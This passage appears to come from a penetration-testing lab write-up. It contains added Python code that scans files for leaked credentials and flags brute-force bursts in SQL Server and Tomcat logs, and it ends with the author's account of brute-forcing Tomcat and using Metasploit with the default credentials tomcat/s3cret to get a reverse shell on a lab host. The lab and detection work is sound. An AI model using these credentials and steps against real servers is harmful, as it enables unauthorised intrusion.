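# Constructed files modelled on the two finds in the writeup; key body, password
# and host are placeholders, not the lab's values.
SAMPLE_FILES = {
    "project/backup/test/sdadas.txt": (
        "Driver={SQL Server};Server=foosql.foo.com;Database=;Uid=fooadmin;Pwd=fooadmin;\n"
        "/var/www/html/project/354253425234234/flag.txt\n"
    ),
    ".ssh/id_rsa.pub": (
        "ssh-rsa AAAAB3NzaC1yc2E_PLACEHOLDER_KEY_BODY== rsa-key-20190313"
        "###ssh://developer:PLACEHOLDER_PASSWORD@host.example:22########\n"
    ),
    ".ssh/id_rsa": "-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER_KEY_BODY\n-----END RSA PRIVATE KEY-----\n",
    "README": "connect with ssh developer@host.example; the password is in the vault\n",
}


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    kind: str
    redacted: str  # the report never carries the secret itself


def redact(secret):
    """Keep the first character so two findings of the same secret can be correlated."""
    return secret[0] + "*" * (len(secret) - 1) if len(secret) > 1 else "*"


def scan_text(path, text):
    """Scan one file's contents; returns a list of Finding objects."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        user = m.group(1) if (m := CONN_USER_RE.search(line)) else None
        for m in CONN_PASSWORD_RE.finditer(line):
            findings.append(Finding(path, lineno, "connection-string password", redact(m.group(1))))
            if user is not None and user.lower() == m.group(1).lower():
                findings.append(Finding(path, lineno, "username reused as password", redact(m.group(1))))
        for m in URL_CREDS_RE.finditer(line):
            kind = f"credentials embedded in {m['scheme']}:// URL for {m['user']}@{m['host']}"
            findings.append(Finding(path, lineno, kind, redact(m["pw"])))
        if PRIVATE_KEY_RE.search(line):
            findings.append(Finding(path, lineno, "private key material", ""))
    return findings


def scan_files(files):
    """files: mapping of path -> contents (read them from disk or a web root in real use)."""
    return [f for path, text in files.items() for f in scan_text(path, text)]


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line}: {f.kind} {f.redacted}")
```

Pointed at a web root or a home directory, the same rules would have surfaced the backup directory's connection string and the padded comment in id_rsa.pub, and the padding trick (the credentials pushed off-screen by a run of `#`) is precisely why a scanner should look at whole lines rather than what fits in a terminal.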
Taking a look at Tomcat again after getting a hint
From the "solution" part, we see that tomcat:s3cret should be the username and password to use. We've already tried this, but the solution also says that if we don't get in with these, the account is most likely locked out because we tried to bruteforce it...
Kind of bad though: in a real-world scenario this account would stay locked, and we can't just call up the people who own the server and ask them to unlock it, which is basically what the suggestion here amounts to (we're resetting the box).
This is the last box we've got to pwn, so we reset it all.
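Both brute-force attempts in this writeup leave a clear trail on the target: SQL Server writes every failed login to its ERRORLOG together with the client address, Tomcat's access log records each 401 on /manager/html, and Tomcat's LockOutRealm (which by default locks an account after 5 failures for 300 seconds) logs the locked account to the catalina log. The following Python detector is an added example, not from the original writeup; the log lines are constructed in the real formats, and the threshold and window are the editor's assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# SQL Server ERRORLOG "Login failed" entry (real format; the lines below are constructed).
MSSQL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ Logon\s+Login failed for user "
    r"'(?P<user>[^']+)'.*\[CLIENT: (?P<client>[\d.]+)\]"
)
# Tomcat access log in common log format (constructed lines below).
ACCESS_RE = re.compile(
    r'^(?P<client>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Tomcat catalina log line written by LockOutRealm once an account is locked.
LOCKOUT_RE = re.compile(r'LockOutRealm.*locked user "(?P<user>[^"]+)"')

SAMPLE_LOG = [
    # seven failures for sa from one client inside ten seconds (constructed)
    *[
        f"2021-03-02 12:50:{s:02d}.41 Logon       Login failed for user 'sa'. "
        f"Reason: Password did not match that for the login provided. [CLIENT: 172.16.64.12]"
        for s in range(1, 8)
    ],
    # one isolated failure: a typo, not a burst
    "2021-03-02 12:51:30.10 Logon       Login failed for user 'jerry'. "
    "Reason: Password did not match that for the login provided. [CLIENT: 172.16.64.50]",
    # five 401s on the manager app from the same client, then a legitimate 200 from another
    *[
        f'172.16.64.12 - - [02/Mar/2021:12:55:{s:02d} -0500] "GET /manager/html HTTP/1.1" 401 2473'
        for s in range(5)
    ],
    '172.16.64.13 - - [02/Mar/2021:12:56:00 -0500] "GET /manager/html HTTP/1.1" 200 9841',
    '02-Mar-2021 12:55:05.321 WARNING [http-nio-8080-exec-3] '
    'org.apache.catalina.realm.LockOutRealm.filterLockedAccounts '
    'An attempt was made to authenticate the locked user "tomcat"',
]


def parse_failure(line):
    """Return (timestamp, client, target) for a failed-login line, else None."""
    if m := MSSQL_RE.match(line):
        return datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["client"], "mssql:" + m["user"]
    if (m := ACCESS_RE.match(line)) and m["status"] == "401":
        ts = datetime.strptime(m["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
        return ts, m["client"], "tomcat:" + m["path"]
    return None


def detect_bursts(lines, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window count of failures per (client, target); each log must be in time order.
    Returns one alert per (client, target) that reaches `threshold` failures inside `window`."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        if (event := parse_failure(line)) is None:
            continue
        ts, client, target = event
        q = recent[(client, target)]
        q.append(ts)
        while ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and (client, target) not in alerts:
            alerts[(client, target)] = {"count": len(q), "first": q[0], "last": ts}
    return alerts


def locked_accounts(lines):
    """Accounts Tomcat's LockOutRealm reports as locked: the brute force has already caused a denial of service."""
    return [m["user"] for m in map(LOCKOUT_RE.search, lines) if m]


if __name__ == "__main__":
    for (client, target), a in detect_bursts(SAMPLE_LOG).items():
        print(f"ALERT {client} -> {target}: {a['count']} failures between {a['first']} and {a['last']}")
    print("locked:", locked_accounts(SAMPLE_LOG))
```

The point of alerting on the failure burst rather than on the lockout is timing: the lockout line only appears after the attacker has already succeeded in locking the admin out, whereas five failures in a minute from one client is visible while the attempt is still running.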
Using exploit/multi/http/tomcat_mgr_upload in Metasploit against 172.16.64.101 port 8080 with the username and password tomcat/s3cret, we can upload a reverse shell and get the box within seconds.
Didn't bother to enumerate the box. Got two flags, from developer and elmsadmin-something...
The objective is probably to get root on it though...